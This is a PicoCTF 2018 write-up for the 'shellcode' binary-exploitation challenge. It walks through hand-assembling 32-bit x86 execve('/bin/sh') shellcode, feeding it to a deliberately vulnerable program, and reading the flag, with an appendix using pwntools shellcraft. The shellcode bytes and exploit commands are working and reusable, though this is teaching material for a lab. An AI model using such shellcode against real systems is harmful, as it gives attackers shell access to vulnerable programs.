PicoCTF 2018 - Shellcode
Note: This article is part of our PicoCTF 2018 BinExp Guide.
Spot the Bug
This one isn’t so much a bug as an giant intentional gaping hole:
char buf[BUFSIZE];
puts("Enter a string!");
// ...
gets(buf);
puts(buf);
// ...
puts("Thanks! Executing now...");
((void (*)())buf)();
Basically, the raw input is read until the first newline (0x0A
) and stored in the buffer buf
. We then attempt to call buf
as if it were a function. This is a highly contrived example (modern code would not have the stack segment be marked executable, and would segfault before ever running an instruction). However, it is a beautiful blank canvas for us to learn how to hand-craft some shellcode.
Strategy
The strategy here is pretty simple - If we can fill the buf
with bytes that look like code, then that code will be executed.
The “classic” shellcode example is something like this (c99):
execve("/bin/sh", (char*[]){NULL}, (char*[]){NULL});
But sometimes, you’ll see this written:
execve("/bin/sh", 0, 0);
Which will also work (on linux ONLY). The difference is that first one uses a pointer to an array that contains a null, in the later the pointer itself is null. Linux allows the later, but strictly speaking the former is the correct form of invoking execve without any argv
or envp
.
If you can fill buf
with the machine code corresponding with a call to execve
like that, then the current program will be replaced with "/bin/sh"
and you will have access to a shell. If you’re already sitting on some sweet shellcode, then go ahead and attempt /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4
on the shell server now.
Background Info
When compiling c code, execve
is normally linked into libc, but ultimately, the call itself is performed by the kernel. In fact, the kernel has it’s own implementation of exactly the execve
function and we can request that the kernel execute that function by performing a system call. Exactly what system calls are available, and how you call them, varies by platform. For 32-bit x86 programs, the exact system calls available ultimately depend on your kernel sources, but there exist tables that have done the work for you and present everything in a simple way.
Looking for SYS_execve
, we see for 32-bit linux systems the syscall number is 0x0b
(11). This value goes into the eax
register. Likewise, a pointer to the filename goes into ebx
, a pointer to the argv[]
goes into ecx
, and a pointer to the envp[]
array goes into edx
. On 32-bit x86 linux, a system call can be requested by executing the “int 0x80
” instruction, which is a software interrupt (number 0x80
). NOTE: There are other methods of invoking a system call as well, including sysenter
and vDSO
, but the software interrupt is simplest (and slowest) method.
We also note that we are executing buf
directly, and that it’s value isn’t copied around first using something like strcpy
or strdup
. Therefore, we don’t have to worry about the buffer being truncating after nulls, because gets()
itself will continuing copying past any null bytes up-to the first newline ('\n'
== 0x0A
). Therefore, the only “illegal” character that our shellcode should not contain is a newline.
Now that we have all the information we need, let’s craft some shellcode by hand. Here, I’ll be using nasm
to compile my assembly code (text) into machine code (binary bytes corresponding with opcodes).
; ~/exploit_shell.S
USE32 ; Directive for nasm to indicate this is 32 bit code
; execve("/bin/sh", (char*[]){NULL}, (char*[]){NULL})
push 0x0068732f ; pushes bytes "/sh" + '\0' - but represented as a little-endian 32bit dword
push 0x6e69622f ; pushes bytes "/bin" - but represented as a little-endian 32bit dword
mov ebx, esp ; ebx = stack pointer, which points at the null-terminated byte sequence "/bin/sh"
xor eax, eax ; eax = 0
push eax ; push 0
mov al, 0x0b ; eax = 0x0b (SYS_execve)
mov ecx, esp ; ecx = stack pointer, which points at a 4 byte '0' (aka NULL)
mov edx, esp ; edx = stack pointer, which points at a 4 byte '0' (aka NULL)
int 0x80 ; syscall
First off, let’s make sure it assembles, and see if the resulting machine code contains any “illegal” newlines:
$ nasm -f bin exploit_shell.S -o /dev/stdout | xxd -i
0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3,
0x31, 0xc0, 0x50, 0xb0, 0x0b, 0x89, 0xe1, 0x89, 0xe2, 0xcd, 0x80
$ nasm -f bin exploit_shell.S -o /dev/stdout | xxd -i | grep -c "0x0a"
0
Yay! We’ve done it. We’ve constructed some machine code that should call execve
and it doesn’t contain any “illegal” chars. If it did contain illegal chars, we’d have to figure where exactly where they came from and come up with alternative assembly instructions to accomplish the same thing. For instance, if null bytes were illegal, we’d have to figure out how to change push 0x0068732f
into something that didn’t contain a 0x00
when encoded. You might, for instance, do a push 0x0169722e
followed by a xor dword ptr [esp], 0x01010101
- which will result in 0x0068732f
ending up on the stack as desired.
Exploitation
First, cd
into the problem directory /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4
on the shell server. Now, at this point, you’d probably be tempted to do something like this (I know I was):
$ nasm -f bin ~/exploit_shell.S -o /dev/stdout | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
Well - the good news is it didn’t crash. The bad news is it didn’t give us a shell. So… What happened?
I spent a bit of time debugging this before finally giving up and switching to pwntools
(which we’ll go over in a minute). Now that I’ve come back to it, I can tell you exactly what happened: everything worked exactly the way we wrote it. The problem is that after printing out the shell code, there was no more input to give /bin/sh
(the stream was at EOF), so the shell immediately quits. What you need is something that still writes to stdout after the shell launches. To prove that everything is working, you can run something like this:
$ (nasm -f bin ~/exploit_shell.S -o /dev/stdout && echo && sleep 1 && echo ls) | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
flag.txt vuln vuln.c
What this does is launch a series of commands in a subshell (that’s what the ‘(
’ and ‘)
’ are for). That series of commands writes out the shellcode, followed by a newline, then waits for 1 second (while /bin/sh starts
), then it writes “ls
”. That input is fed into the ./vuln
program, which ends up turning into /bin/sh
after the shellcode executes, which then prints out the content of the current directory after receiving the ls
command.
Of course, that terminal still isn’t interactive. If you want one of those, you should do something like this:
$ cat - | (nasm -f bin ~/exploit_shell.S -o /dev/stdout && echo && cat -) | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
ls
flag.txt vuln vuln.c
cat flag.txt
picoCTF{===REDACTED===}
BOOM! You’ve achieved an interactive terminal from handcrafted shellcode using nothing but an assembler.
Now that you’ve solved shellcode, head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.
Appendix - pwntools
We’ll go into pwntools
more in future guides, but here’s a quick tease of how you might do this challenge with pwntools (using its built-in shellcode that is null and newline free):
$ python
Python 2.7.12 (default, Jul 21 2020, 15:19:50)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> context.update(arch='i386', os='linux')
>>> p = process("./vuln")
[x] Starting local process './vuln'
[+] Starting local process './vuln': pid 2676856
>>> print(shellcraft.linux.sh().rstrip())
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
>>> print(enhex(asm(shellcraft.linux.sh())))
6a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a0b58cd80
>>> p.sendline(asm(shellcraft.linux.sh()))
>>> p.interactive()
[*] Switching to interactive mode
Enter a string!
jhh///sh/bin��h�4$ri1�QjY�Q��1�j
X̀
Thanks! Executing now...
ls
flag.txt vuln vuln.c
cat flag.txt
picoCTF{===REDACTED===}